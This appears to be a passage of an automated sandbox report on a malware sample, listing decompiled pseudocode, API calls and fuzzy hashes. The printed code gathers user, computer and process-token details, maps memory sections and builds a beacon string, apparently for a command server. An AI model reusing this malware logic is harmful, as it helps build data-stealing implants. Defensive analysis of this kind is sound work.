                • GetUserNameW.ADVAPI32(00000000,?), ref: 001D2DA5
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 001D2DBC
                • GetUserNameW.ADVAPI32(00000000,?), ref: 001D2DC9
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,001D5D80), ref: 001D2DEA
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 001D2E11
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001D2E25
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 001D2E32
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,001D5D80), ref: 001D2E50
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: HeapName$AllocateComputerFreeUser
                • String ID:
                • API String ID: 3239747167-0
                • Opcode ID: 85bfe58c0d83d6476311eb3e4ad05de20e6f04b8cac8719d933bfc0155db8af5
                • Instruction ID: 3203ed09b876da666a815ea14409576ad20c887d86423e97318852f3a4858b0c
                • Opcode Fuzzy Hash: 85bfe58c0d83d6476311eb3e4ad05de20e6f04b8cac8719d933bfc0155db8af5
                • Instruction Fuzzy Hash: A7311872A01206EFDB10DFA9DD81A6EB7F9FF98300F61452AE515D7620EB30EE419B50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 38%
                			E001D1168(char _a4, void* _a8) {
                				void* _v8;
                				void* _v12;
                				char _v16;
                				void* _v20;
                				char _v24;
                				char _v28;
                				char _v32;
                				char _v36;
                				char _v40;
                				void* _v44;
                				void** _t33;
                				void* _t40;
                				void* _t43;
                				void** _t44;
                				intOrPtr* _t47;
                				char _t48;
                
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v20 = _a4;
                				_t48 = 0;
                				_v16 = 0;
                				_a4 = 0;
                				_v44 = 0x18;
                				_v40 = 0;
                				_v32 = 0;
                				_v36 = 0;
                				_v28 = 0;
                				_v24 = 0;
                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                					_t33 =  &_v8;
                					__imp__(_v12, 8, _t33);
                					if(_t33 >= 0) {
                						_t47 = __imp__;
                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                						_t44 = E001D7E20(_a4);
                						if(_t44 != 0) {
                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                							if(_t40 >= 0) {
                								memcpy(_a8,  *_t44, 0x1c);
                								_t48 = 1;
                							}
                							E001DA5FA(_t44);
                						}
                						NtClose(_v8); // executed
                					}
                					NtClose(_v12);
                				}
                				return _t48;
                			}

                APIs
                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 001D11AF
                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 001D11C2
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 001D11DE
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 001D11FB
                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 001D1208
                • NtClose.NTDLL(?), ref: 001D121A
                • NtClose.NTDLL(00000000), ref: 001D1224
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: 7916940d13eac0714ca15a6b2c0c5d2b2f0af2a0775b2a8d94acde679d8cc629
                • Instruction ID: 7706d7eb31f194aa2c024208ee454ea935ec9bcbb27c8e44de5563f883918ce8
                • Opcode Fuzzy Hash: 7916940d13eac0714ca15a6b2c0c5d2b2f0af2a0775b2a8d94acde679d8cc629
                • Instruction Fuzzy Hash: 9921E7B2A01229BBDB01DF95DC85ADEBFBDEF18740F104016F901E6261D7719A84DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E6E2415F1(intOrPtr* __eax, void** _a4) {
                				int _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				int _v28;
                				int _v32;
                				intOrPtr _v36;
                				int _v40;
                				int _v44;
                				void* _v48;
                				void* __esi;
                				long _t34;
                				void* _t39;
                				void* _t47;
                				intOrPtr* _t48;
                
                				_t48 = __eax;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v24 =  *((intOrPtr*)(__eax + 4));
                				_v16 = 0;
                				_v12 = 0;
                				_v48 = 0x18;
                				_v44 = 0;
                				_v36 = 0x40;
                				_v40 = 0;
                				_v32 = 0;
                				_v28 = 0;
                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                				if(_t34 < 0) {
                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                				} else {
                					 *_t48 = _v16;
                					_t39 = E6E241F14(_t48,  &_v12); // executed
                					_t47 = _t39;
                					if(_t47 != 0) {
                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                					} else {
                						memset(_v12, 0, _v24);
                						 *_a4 = _v12;
                					}
                				}
                				return _t47;
                			}


                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E24164E
                  • Part of subcall function 6E241F14: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E241663,00000002,00000000,?,?,00000000,?,?,6E241663,00000002), ref: 6E241F41
                • memset.NTDLL ref: 6E241670
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
                • Instruction ID: 709a5471a08e8ab81e948f367a6770f83130d51cf2deed4552bd097e1e55ba95
                • Opcode Fuzzy Hash: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
                • Instruction Fuzzy Hash: 2B21F9B6D0020DAFDB01CFE9C8849DEFBB9EB48354F108429E505F3210D730AA598B64
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID:
                • String ID: Q$e
                • API String ID: 0-1578101220
                • Opcode ID: 4b16155977349b0c69f5dd830565383ff23465e0584ef4e99a1b84df2c602f7d
                • Instruction ID: 2a4576599b4f5a052ae5fb22c8613e81423caa59af7b6d0df5a90eea85678ed4
                • Opcode Fuzzy Hash: 4b16155977349b0c69f5dd830565383ff23465e0584ef4e99a1b84df2c602f7d
                • Instruction Fuzzy Hash: 92A2F571E48B298FCF18CF7DC89C9557BA3BF96308B058A29E5498B385D6F09509CB70
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E6E241F14(void** __esi, PVOID* _a4) {
                				long _v8;
                				void* _v12;
                				void* _v16;
                				long _t13;
                
                				_v16 = 0;
                				asm("stosd");
                				_v8 = 0;
                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                				if(_t13 < 0) {
                					_push(_t13);
                					return __esi[6]();
                				}
                				return 0;
                			}


                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E241663,00000002,00000000,?,?,00000000,?,?,6E241663,00000002), ref: 6E241F41
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: 0db1f313645c3cf222922a8decbb90cd028158adbc3c839dcee37312fe8dfc66
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: 67F0F8B690420CFFEB119EA5CC85C9BBBBDEB44294B104A69B652A1090D630AE5D8A60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E001D24B4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                				void* _v8;
                				signed int _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				void* _v28;
                				void* __ebx;
                				void* __edi;
                				long _t59;
                				intOrPtr _t60;
                				intOrPtr _t61;
                				intOrPtr _t62;
                				intOrPtr _t63;
                				intOrPtr _t64;
                				void* _t67;
                				intOrPtr _t68;
                				int _t71;
                				void* _t72;
                				void* _t73;
                				void* _t75;
                				void* _t78;
                				intOrPtr _t82;
                				intOrPtr _t86;
                				intOrPtr* _t88;
                				void* _t94;
                				intOrPtr _t101;
                				signed int _t105;
                				char** _t107;
                				int _t110;
                				intOrPtr* _t113;
                				intOrPtr* _t115;
                				intOrPtr* _t117;
                				intOrPtr* _t119;
                				intOrPtr _t122;
                				intOrPtr _t127;
                				int _t131;
                				CHAR* _t133;
                				intOrPtr _t134;
                				void* _t135;
                				void* _t144;
                				int _t145;
                				void* _t146;
                				intOrPtr _t147;
                				void* _t149;
                				long _t153;
                				intOrPtr* _t154;
                				intOrPtr* _t155;
                				intOrPtr* _t158;
                				void* _t159;
                				void* _t161;
                
                				_t144 = __edx;
                				_t135 = __ecx;
                				_t59 = __eax;
                				_v12 = 8;
                				if(__eax == 0) {
                					_t59 = GetTickCount();
                				}
                				_t60 =  *0x1dd018; // 0xd1eb352c
                				asm("bswap eax");
                				_t61 =  *0x1dd014; // 0x3a87c8cd
                				_t133 = _a16;
                				asm("bswap eax");
                				_t62 =  *0x1dd010; // 0xd8d2f808
                				asm("bswap eax");
                				_t63 = E001DD00C; // 0xeec43f25
                				asm("bswap eax");
                				_t64 =  *0x1dd2a4; // 0x2dca5a8
                				_t3 = _t64 + 0x1de633; // 0x74666f73
                				_t145 = wsprintfA(_t133, _t3, 3, 0x3d154, _t63, _t62, _t61, _t60, E001DD02C,  *0x1dd004, _t59);
                				_t67 = E001D2914();
                				_t68 =  *0x1dd2a4; // 0x2dca5a8
                				_t4 = _t68 + 0x1de673; // 0x74707526
                				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                				_t161 = _t159 + 0x38;
                				_t146 = _t145 + _t71; // executed
                				_t72 = E001D3F0E(_t135); // executed
                				_t134 = __imp__;
                				_v8 = _t72;
                				if(_t72 != 0) {
                					_t127 =  *0x1dd2a4; // 0x2dca5a8
                					_t7 = _t127 + 0x1de8eb; // 0x736e6426
                					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                					_t161 = _t161 + 0xc;
                					_t146 = _t146 + _t131;
                					HeapFree( *0x1dd238, 0, _v8);
                				}
                				_t73 = E001D1363();
                				_v8 = _t73;
                				if(_t73 != 0) {
                					_t122 =  *0x1dd2a4; // 0x2dca5a8
                					_t11 = _t122 + 0x1de8f3; // 0x6f687726
                					wsprintfA(_t146 + _a16, _t11, _t73);
                					_t161 = _t161 + 0xc;
                					HeapFree( *0x1dd238, 0, _v8);
                				}
                				_t147 =  *0x1dd32c; // 0x2fa95b0
                				_t75 = E001D18D5(0x1dd00a, _t147 + 4);
                				_t153 = 0;
                				_v20 = _t75;
                				if(_t75 == 0) {
                					L26:
                					HeapFree( *0x1dd238, _t153, _a16);
                					return _v12;
                				} else {
                					_t78 = RtlAllocateHeap( *0x1dd238, 0, 0x800);
                					_v8 = _t78;
                					if(_t78 == 0) {
                						L25:
                						HeapFree( *0x1dd238, _t153, _v20);
                						goto L26;
                					}
                					E001D6852(GetTickCount());
                					_t82 =  *0x1dd32c; // 0x2fa95b0
                					__imp__(_t82 + 0x40);
                					asm("lock xadd [eax], ecx");
                					_t86 =  *0x1dd32c; // 0x2fa95b0
                					__imp__(_t86 + 0x40);
                					_t88 =  *0x1dd32c; // 0x2fa95b0
                					_t149 = E001D8840(1, _t144, _a16,  *_t88);
                					_v28 = _t149;
                					asm("lock xadd [eax], ecx");
                					if(_t149 == 0) {
                						L24:
                						HeapFree( *0x1dd238, _t153, _v8);
                						goto L25;
                					}
                					StrTrimA(_t149, 0x1dc2ac);
                					_push(_t149);
                					_t94 = E001D8007();
                					_v16 = _t94;
                					if(_t94 == 0) {
                						L23:
                						HeapFree( *0x1dd238, _t153, _t149);
                						goto L24;
                					}
                					_t154 = __imp__;
                					 *_t154(_t149, _a4);
                					 *_t154(_v8, _v20);
                					_t155 = __imp__;
                					 *_t155(_v8, _v16);
                					 *_t155(_v8, _t149);
                					_t101 = E001D1546(0, _v8);
                					_a4 = _t101;
                					if(_t101 == 0) {
                						_v12 = 8;
                						L21:
                						E001D45F1();
                						L22:
                						HeapFree( *0x1dd238, 0, _v16);
                						_t153 = 0;
                						goto L23;
                					}
                					_t105 = E001D2284(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
                					_v12 = _t105;
                					if(_t105 == 0) {
                						_t158 = _v24;
                						_v12 = E001D5349(_t158, _a4, _a8, _a12);
                						_t113 =  *((intOrPtr*)(_t158 + 8));
                						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
                						_t115 =  *((intOrPtr*)(_t158 + 8));
                						 *((intOrPtr*)( *_t115 + 8))(_t115);
                						_t117 =  *((intOrPtr*)(_t158 + 4));
                						 *((intOrPtr*)( *_t117 + 8))(_t117);
                						_t119 =  *_t158;
                						 *((intOrPtr*)( *_t119 + 8))(_t119);
                						E001DA5FA(_t158);
                					}
                					if(_v12 != 0x10d2) {
                						L16:
                						if(_v12 == 0) {
                							_t107 = _a8;
                							if(_t107 != 0) {
                								_t150 =  *_t107;
                								_t156 =  *_a12;
                								wcstombs( *_t107,  *_t107,  *_a12);
                								_t110 = E001D88F0(_t150, _t150, _t156 >> 1);
                								_t149 = _v28;
                								 *_a12 = _t110;
                							}
                						}
                						goto L19;
                					} else {
                						if(_a8 != 0) {
                							L19:
                							E001DA5FA(_a4);
                							if(_v12 == 0 || _v12 == 0x10d2) {
                								goto L22;
                							} else {
                								goto L21;
                							}
                						}
                						_v12 = _v12 & 0x00000000;
                						goto L16;
                					}
                				}
                			}


                APIs
                • GetTickCount.KERNEL32 ref: 001D24C8
                • wsprintfA.USER32 ref: 001D2518
                • wsprintfA.USER32 ref: 001D2535
                • wsprintfA.USER32 ref: 001D2561
                • HeapFree.KERNEL32(00000000,?), ref: 001D2573
                • wsprintfA.USER32 ref: 001D2594
                • HeapFree.KERNEL32(00000000,?), ref: 001D25A4
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001D25D2
                • GetTickCount.KERNEL32 ref: 001D25E3
                • RtlEnterCriticalSection.NTDLL(02FA9570), ref: 001D25F7
                • RtlLeaveCriticalSection.NTDLL(02FA9570), ref: 001D2615
                  • Part of subcall function 001D8840: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,001D2AF0,?,02FA95B0), ref: 001D886B
                  • Part of subcall function 001D8840: lstrlen.KERNEL32(?,?,?,001D2AF0,?,02FA95B0), ref: 001D8873
                  • Part of subcall function 001D8840: strcpy.NTDLL ref: 001D888A
                  • Part of subcall function 001D8840: lstrcat.KERNEL32(00000000,?), ref: 001D8895
                  • Part of subcall function 001D8840: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,001D2AF0,?,02FA95B0), ref: 001D88B2
                • StrTrimA.SHLWAPI(00000000,001DC2AC,?,02FA95B0), ref: 001D264C
                  • Part of subcall function 001D8007: lstrlen.KERNEL32(02FA9918,00000000,00000000,7742C740,001D2B1B,00000000), ref: 001D8017
                  • Part of subcall function 001D8007: lstrlen.KERNEL32(?), ref: 001D801F
                  • Part of subcall function 001D8007: lstrcpy.KERNEL32(00000000,02FA9918), ref: 001D8033
                  • Part of subcall function 001D8007: lstrcat.KERNEL32(00000000,?), ref: 001D803E
                • lstrcpy.KERNEL32(00000000,?), ref: 001D266D
                • lstrcpy.KERNEL32(?,?), ref: 001D2675
                • lstrcat.KERNEL32(?,?), ref: 001D2683
                • lstrcat.KERNEL32(?,00000000), ref: 001D2689
                  • Part of subcall function 001D1546: lstrlen.KERNEL32(?,00000000,001DD330,00000001,001D67F7,001DD00C,001DD00C,00000000,00000005,00000000,00000000,?,?,?,001D41AA,001D5D90), ref: 001D154F
                  • Part of subcall function 001D1546: mbstowcs.NTDLL ref: 001D1576
                  • Part of subcall function 001D1546: memset.NTDLL ref: 001D1588
                • wcstombs.NTDLL ref: 001D271C
                  • Part of subcall function 001D5349: SysAllocString.OLEAUT32(?), ref: 001D5384
                  • Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606
                • HeapFree.KERNEL32(00000000,?,?), ref: 001D275D
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D2769
                • HeapFree.KERNEL32(00000000,?,?,02FA95B0), ref: 001D2775
                • HeapFree.KERNEL32(00000000,?), ref: 001D2781
                • HeapFree.KERNEL32(00000000,?), ref: 001D278D
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                • String ID:
                • API String ID: 3748877296-0
                • Opcode ID: 33dba041d353120b68728f5c363192e2b72c02038d68d66ee9ba88ea5eacd344
                • Instruction ID: f5669af91af33fa2db3e31326d1ef33c1319d3ec32a057bcb63bd8165702ed2d
                • Opcode Fuzzy Hash: 33dba041d353120b68728f5c363192e2b72c02038d68d66ee9ba88ea5eacd344
                • Instruction Fuzzy Hash: F9914971902219EFCB11EFA8EC89AAE7BB9FF58310F144456F408D7260DB31D991DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 51%
                			E001DAD95(long _a4, long _a8) {
                				signed int _v8;
                				intOrPtr _v16;
                				LONG* _v28;
                				long _v40;
                				long _v44;
                				long _v48;
                				CHAR* _v52;
                				long _v56;
                				CHAR* _v60;
                				long _v64;
                				signed int* _v68;
                				char _v72;
                				signed int _t76;
                				signed int _t80;
                				signed int _t81;
                				intOrPtr* _t82;
                				intOrPtr* _t83;
                				intOrPtr* _t85;
                				intOrPtr* _t90;
                				intOrPtr* _t95;
                				intOrPtr* _t98;
                				struct HINSTANCE__* _t99;
                				void* _t102;
                				intOrPtr* _t104;
                				void* _t115;
                				long _t116;
                				void _t125;
                				void* _t131;
                				signed short _t133;
                				struct HINSTANCE__* _t138;
                				signed int* _t139;
                
                				_t139 = _a4;
                				_v28 = _t139[2] + 0x1d0000;
                				_t115 = _t139[3] + 0x1d0000;
                				_t131 = _t139[4] + 0x1d0000;
                				_v8 = _t139[7];
                				_v60 = _t139[1] + 0x1d0000;
                				_v16 = _t139[5] + 0x1d0000;
                				_v64 = _a8;
                				_v72 = 0x24;
                				_v68 = _t139;
                				_v56 = 0;
                				asm("stosd");
                				_v48 = 0;
                				_v44 = 0;
                				_v40 = 0;
                				if(( *_t139 & 0x00000001) == 0) {
                					_a8 =  &_v72;
                					RaiseException(0xc06d0057, 0, 1,  &_a8);
                					return 0;
                				}
                				_t138 =  *_v28;
                				_t76 = _a8 - _t115 >> 2 << 2;
                				_t133 =  *(_t131 + _t76);
                				_a4 = _t76;
                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                				_v56 = _t80;
                				_t81 = _t133 + 0x1d0002;
                				if(_t80 == 0) {
                					_t81 = _t133 & 0x0000ffff;
                				}
                				_v52 = _t81;
                				_t82 =  *0x1dd1a0; // 0x0
                				_t116 = 0;
                				if(_t82 == 0) {
                					L6:
                					if(_t138 != 0) {
                						L18:
                						_t83 =  *0x1dd1a0; // 0x0
                						_v48 = _t138;
                						if(_t83 != 0) {
                							_t116 =  *_t83(2,  &_v72);
                						}
                						if(_t116 != 0) {
                							L32:
                							 *_a8 = _t116;
                							L33:
                							_t85 =  *0x1dd1a0; // 0x0
                							if(_t85 != 0) {
                								_v40 = _v40 & 0x00000000;
                								_v48 = _t138;
                								_v44 = _t116;
                								 *_t85(5,  &_v72);
                							}
                							return _t116;
                						} else {
                							if(_t139[5] == _t116 || _t139[7] == _t116) {
                								L27:
                								_t116 = GetProcAddress(_t138, _v52);
                								if(_t116 == 0) {
                									_v40 = GetLastError();
                									_t90 =  *0x1dd19c; // 0x0
                									if(_t90 != 0) {
                										_t116 =  *_t90(4,  &_v72);
                									}
                									if(_t116 == 0) {
                										_a4 =  &_v72;
                										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                										_t116 = _v44;
                									}
                								}
                								goto L32;
                							} else {
                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                									_t116 =  *(_a4 + _v16);
                									if(_t116 != 0) {
                										goto L32;
                									}
                								}
                								goto L27;
                							}
                						}
                					}
                					_t98 =  *0x1dd1a0; // 0x0
                					if(_t98 == 0) {
                						L9:
                						_t99 = LoadLibraryA(_v60); // executed
                						_t138 = _t99;
                						if(_t138 != 0) {
                							L13:
                							if(InterlockedExchange(_v28, _t138) == _t138) {
                								FreeLibrary(_t138);
                							} else {
                								if(_t139[6] != 0) {
                									_t102 = LocalAlloc(0x40, 8);
                									if(_t102 != 0) {
                										 *(_t102 + 4) = _t139;
                										_t125 =  *0x1dd198; // 0x0
                										 *_t102 = _t125;
                										 *0x1dd198 = _t102;
                									}
                								}
                							}
                							goto L18;
                						}
                						_v40 = GetLastError();
                						_t104 =  *0x1dd19c; // 0x0
                						if(_t104 == 0) {
                							L12:
                							_a8 =  &_v72;
                							RaiseException(0xc06d007e, 0, 1,  &_a8);
                							return _v44;
                						}
                						_t138 =  *_t104(3,  &_v72);
                						if(_t138 != 0) {
                							goto L13;
                						}
                						goto L12;
                					}
                					_t138 =  *_t98(1,  &_v72);
                					if(_t138 != 0) {
                						goto L13;
                					}
                					goto L9;
                				}
                				_t116 =  *_t82(0,  &_v72);
                				if(_t116 != 0) {
                					goto L33;
                				}
                				goto L6;
                			}


                APIs
                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DAE0E
                • LoadLibraryA.KERNELBASE(?), ref: 001DAE8B
                • GetLastError.KERNEL32 ref: 001DAE97
                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 001DAECA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                • String ID: $
                • API String ID: 948315288-3993045852
                • Opcode ID: e0516122e1802004884b0ed34049cbb4b430eebc93eef66cb38171f5aaed113e
                • Instruction ID: 71e73a94895b2a45ae9bc5dffe0e5c08cbb54b463ae632a965f875cc2528b588
                • Opcode Fuzzy Hash: e0516122e1802004884b0ed34049cbb4b430eebc93eef66cb38171f5aaed113e
                • Instruction Fuzzy Hash: 178138B5A01205AFDB20CFA8D880BAEB7F5EF58300F54852AE909E7750EB70E945CB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E001D8494(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                				struct %anon52 _v8;
                				long _v12;
                				char _v16;
                				char _v20;
                				signed int _v24;
                				intOrPtr _v32;
                				union _LARGE_INTEGER _v36;
                				intOrPtr _v40;
                				void* _v44;
                				void _v88;
                				char _v92;
                				struct %anon52 _t46;
                				intOrPtr _t51;
                				long _t53;
                				void* _t54;
                				struct %anon52 _t60;
                				long _t64;
                				signed int _t65;
                				void* _t68;
                				void* _t70;
                				signed int _t71;
                				intOrPtr _t73;
                				intOrPtr _t76;
                				void** _t78;
                				void* _t80;
                
                				_t73 = __edx;
                				_v92 = 0;
                				memset( &_v88, 0, 0x2c);
                				_t46 = CreateWaitableTimerA(0, 1, 0);
                				_v44 = _t46;
                				if(_t46 == 0) {
                					_v8.LowPart = GetLastError();
                				} else {
                					_push(0xffffffff);
                					_push(0xff676980);
                					_push(0);
                					_push( *0x1dd240);
                					_v20 = 0;
                					_v16 = 0;
                					L001DB078();
                					_v36.LowPart = _t46;
                					_v32 = _t73;
                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                					_t51 =  *0x1dd26c; // 0x23c
                					_v40 = _t51;
                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                					_v8.LowPart = _t53;
                					if(_t53 == 0) {
                						if(_a8 != 0) {
                							L4:
                							 *0x1dd24c = 5;
                						} else {
                							_t68 = E001D579B(_t73); // executed
                							if(_t68 != 0) {
                								goto L4;
                							}
                						}
                						_v12 = 0;
                						L6:
                						L6:
                						if(_v12 == 1 && ( *0x1dd260 & 0x00000001) == 0) {
                							_v12 = 2;
                						}
                						_t71 = _v12;
                						_t58 = _t71 << 4;
                						_t76 = _t80 + (_t71 << 4) - 0x54;
                						_t72 = _t71 + 1;
                						_v24 = _t71 + 1;
                						_t60 = E001D8A1D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                						_v8.LowPart = _t60;
                						if(_t60 != 0) {
                							goto L17;
                						}
                						_t65 = _v24;
                						_v12 = _t65;
                						_t90 = _t65 - 3;
                						if(_t65 != 3) {
                							goto L6;
                						} else {
                							_v8.LowPart = E001D8634(_t72, _t90,  &_v92, _a4, _a8);
                						}
                						goto L12;
                						L17:
                						__eflags = _t60 - 0x10d2;
                						if(_t60 != 0x10d2) {
                							_push(0xffffffff);
                							_push(0xff676980);
                							_push(0);
                							_push( *0x1dd244);
                							goto L21;
                						} else {
                							__eflags =  *0x1dd248; // 0x0
                							if(__eflags == 0) {
                								goto L12;
                							} else {
                								_t60 = E001D45F1();
                								_push(0xffffffff);
                								_push(0xdc3cba00);
                								_push(0);
                								_push( *0x1dd248);
                								L21:
                								L001DB078();
                								_v36.LowPart = _t60;
                								_v32 = _t76;
                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                								_v8.LowPart = _t64;
                								__eflags = _t64;
                								if(_t64 == 0) {
                									goto L6;
                								} else {
                									goto L12;
                								}
                							}
                						}
                						L25:
                					}
                					L12:
                					_t78 =  &_v92;
                					_t70 = 3;
                					do {
                						_t54 =  *_t78;
                						if(_t54 != 0) {
                							HeapFree( *0x1dd238, 0, _t54);
                						}
                						_t78 =  &(_t78[4]);
                						_t70 = _t70 - 1;
                					} while (_t70 != 0);
                					CloseHandle(_v44);
                				}
                				return _v8;
                				goto L25;
                			}





























                APIs
                • memset.NTDLL ref: 001D84A9
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001D84B5
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001D84DA
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 001D84F6
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D850F
                • HeapFree.KERNEL32(00000000,00000000), ref: 001D85A5
                • CloseHandle.KERNEL32(?), ref: 001D85B4
                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 001D85EE
